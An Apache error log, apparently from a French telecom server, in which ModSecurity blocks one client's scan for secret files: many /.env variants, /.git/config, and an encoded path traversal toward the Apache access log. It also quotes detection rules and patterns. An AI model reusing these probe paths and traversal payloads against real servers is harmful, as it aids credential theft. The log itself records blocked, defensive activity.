[Mon May 11 20:55:35.725784 2026] [ssl:error] [pid 1502013:tid 1502034] (EAI 2)Name or service not known: [client 81.185.169.210:40900] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:55:35.725838 2026] [ssl:error] [pid 1502013:tid 1502034] AH01941: stapling_renew_response: responder error
[Mon May 11 20:55:36.693900 2026] [ssl:error] [pid 1534836:tid 1534894] (EAI 2)Name or service not known: [client 81.185.169.210:40916] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:55:36.693978 2026] [ssl:error] [pid 1534836:tid 1534894] AH01941: stapling_renew_response: responder error
[Mon May 11 20:55:46.730232 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImMpYn-x0CHsbEbP2tCAAAAIQ"]
[Mon May 11 20:55:46.730435 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImMpYn-x0CHsbEbP2tCAAAAIQ"]
[Mon May 11 20:55:46.730679 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImMpYn-x0CHsbEbP2tCAAAAIQ"]
[Mon May 11 20:55:47.146801 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImM5Yn-x0CHsbEbP2tCQAAAIQ"]
[Mon May 11 20:55:47.146945 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImMzP5Q_-MBliRCAxmyQAAABI"]
[Mon May 11 20:55:47.146965 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImM5Yn-x0CHsbEbP2tCQAAAIQ"]
[Mon May 11 20:55:47.147086 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%5c found within REQUEST_URI_RAW: /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImMzP5Q_-MBliRCAxmyQAAABI"]
[Mon May 11 20:55:47.147187 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agImM5Yn-x0CHsbEbP2tCQAAAIQ"]
[Mon May 11 20:55:47.147326 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "..\\\\" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ..\\x5c found within REQUEST_URI: /..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImMzP5Q_-MBliRCAxmyQAAABI"]
[Mon May 11 20:55:47.147343 2026] [security2:error] [pid 1534836:tid 1534878] [client 195.178.110.199:34286] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/.env"] [unique_id "agImM9eaRXe5lR8y0ZOSqwAAAUc"]
[Mon May 11 20:55:47.147367 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImMyMeXtzav-mi9SyxGgAAANA"]
[Mon May 11 20:55:47.147489 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImMzP5Q_-MBliRCAxmyQAAABI"]
[Mon May 11 20:55:47.147492 2026] [security2:error] [pid 1534836:tid 1534878] [client 195.178.110.199:34286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/.env"] [unique_id "agImM9eaRXe5lR8y0ZOSqwAAAUc"]
[Mon May 11 20:55:47.147523 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImMyMeXtzav-mi9SyxGgAAANA"]
[Mon May 11 20:55:47.147874 2026] [security2:error] [pid 1534836:tid 1534878] [client 195.178.110.199:34286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/.env"] [unique_id "agImM9eaRXe5lR8y0ZOSqwAAAUc"]
[Mon May 11 20:55:47.148009 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImMyMeXtzav-mi9SyxGgAAANA"]
[Mon May 11 20:55:47.149147 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agImMzP5Q_-MBliRCAxmyQAAABI"]
[Mon May 11 20:55:47.167338 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.docker/laravel/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/laravel/app/.env"] [unique_id "agImMzP5Q_-MBliRCAxmywAAABM"]
[Mon May 11 20:55:47.167512 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/laravel/app/.env"] [unique_id "agImMzP5Q_-MBliRCAxmywAAABM"]
[Mon May 11 20:55:47.167909 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/laravel/app/.env"] [unique_id "agImMzP5Q_-MBliRCAxmywAAABM"]
[Mon May 11 20:55:47.170105 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env-example"] [unique_id "agImM1NddpkriGUb6ZV2SAAAAQw"]
[Mon May 11 20:55:47.170439 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env-example"] [unique_id "agImM1NddpkriGUb6ZV2SAAAAQw"]
[Mon May 11 20:55:47.171105 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env-example"] [unique_id "agImM1NddpkriGUb6ZV2SAAAAQw"]
[Mon May 11 20:55:47.172838 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env-sample"] [unique_id "agImMzP5Q_-MBliRCAxmzAAAAAo"]
[Mon May 11 20:55:47.173101 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env-sample"] [unique_id "agImMzP5Q_-MBliRCAxmzAAAAAo"]
[Mon May 11 20:55:47.173582 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env-sample"] [unique_id "agImMzP5Q_-MBliRCAxmzAAAAAo"]
[Mon May 11 20:55:47.184785 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.aws"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.aws"] [unique_id "agImM_jVc-A-CSptvm1xCwAAAEg"]
[Mon May 11 20:55:47.184970 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.aws"] [unique_id "agImM_jVc-A-CSptvm1xCwAAAEg"]
[Mon May 11 20:55:47.185180 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.aws"] [unique_id "agImM_jVc-A-CSptvm1xCwAAAEg"]
[Mon May 11 20:55:47.193056 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agImMzP5Q_-MBliRCAxmzQAAAAo"]
[Mon May 11 20:55:47.193298 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agImMzP5Q_-MBliRCAxmzQAAAAo"]
[Mon May 11 20:55:47.193519 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agImMzP5Q_-MBliRCAxmzQAAAAo"]
[Mon May 11 20:55:47.321229 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agImM_jVc-A-CSptvm1xDAAAAEs"]
[Mon May 11 20:55:47.321462 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agImM_jVc-A-CSptvm1xDAAAAEs"]
[Mon May 11 20:55:47.322246 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agImM_jVc-A-CSptvm1xDAAAAEs"]
[Mon May 11 20:55:47.340295 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.config"] [unique_id "agImM_jVc-A-CSptvm1xDQAAAEs"]
